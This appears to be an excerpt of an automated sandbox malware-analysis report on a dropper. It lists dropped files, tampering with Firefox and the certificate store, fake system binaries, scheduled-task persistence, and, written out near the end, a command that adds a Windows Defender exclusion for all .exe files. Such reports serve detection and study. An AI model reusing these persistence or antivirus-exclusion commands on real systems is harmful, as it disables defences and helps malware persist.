| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\EXgRWGG.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\ArGlQVg.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\yvWovCiVU\TRDYCX.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\mVqQIGUXDOgrC\QWFyiZq.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\mVqQIGUXDOgrC\uLcyUgC.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\yvWovCiVU\ABWjUqu.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\LCifMpYymZWU2\HTMRMDKYbCyXN.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\LCifMpYymZWU2\kWMHQKZ.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Program Files (x86)\gbPxNkbXHfUn\lsTuwPS.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe | N/A |
| File created | C:\Windows\Tasks\mRaseIvrfxDtBOYKW.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\FTXCzbcEvROqagNdd.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\eGwAoTnpAObQfPU.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe | N/A |
| File created | C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\u2dw.0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\u2dw.0.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS882B.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS882B.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-571 = "China Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2342 = "Haiti Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-3142 = "South Sudan Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dw.1.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe
"C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
C:\Users\Admin\Pictures\GJJottccSrZvHDi2rOc2biM9.exe
"C:\Users\Admin\Pictures\GJJottccSrZvHDi2rOc2biM9.exe"
C:\Users\Admin\Pictures\O0CPJ0FFbJ7m6QGvaPcCCRWK.exe
"C:\Users\Admin\Pictures\O0CPJ0FFbJ7m6QGvaPcCCRWK.exe"
C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe
"C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe
"C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2244 -ip 2244
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 852
C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe
"C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe"
C:\Users\Admin\AppData\Local\Temp\u2dw.0.exe
"C:\Users\Admin\AppData\Local\Temp\u2dw.0.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1108 -ip 1108
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1108 -ip 1108
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 616
C:\Users\Admin\AppData\Local\Temp\u2dw.1.exe
"C:\Users\Admin\AppData\Local\Temp\u2dw.1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3092 -ip 3092
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 1532
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe
"C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe" --silent --allusers=0
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6e2ce1a8,0x6e2ce1b4,0x6e2ce1c0
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WZ5cX3pyFhvxZFq1AmkufeHv.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WZ5cX3pyFhvxZFq1AmkufeHv.exe" --version
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe
"C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=856 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328021940" --session-guid=359b9ff4-76a1-4233-8f30-0c8fd2afda91 --server-tracking-blob=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 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=9405000000000000
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe
C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6d94e1a8,0x6d94e1b4,0x6d94e1c0
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Users\Admin\Pictures\yuVVFMVY94h4dq6orGkzD9rD.exe
"C:\Users\Admin\Pictures\yuVVFMVY94h4dq6orGkzD9rD.exe"
C:\Users\Admin\AppData\Local\Temp\7zS851E.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe
"C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe"
C:\Users\Admin\AppData\Local\Temp\7zS882B.tmp\Install.exe
.\Install.exe /FHdidhi "385118" /S
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
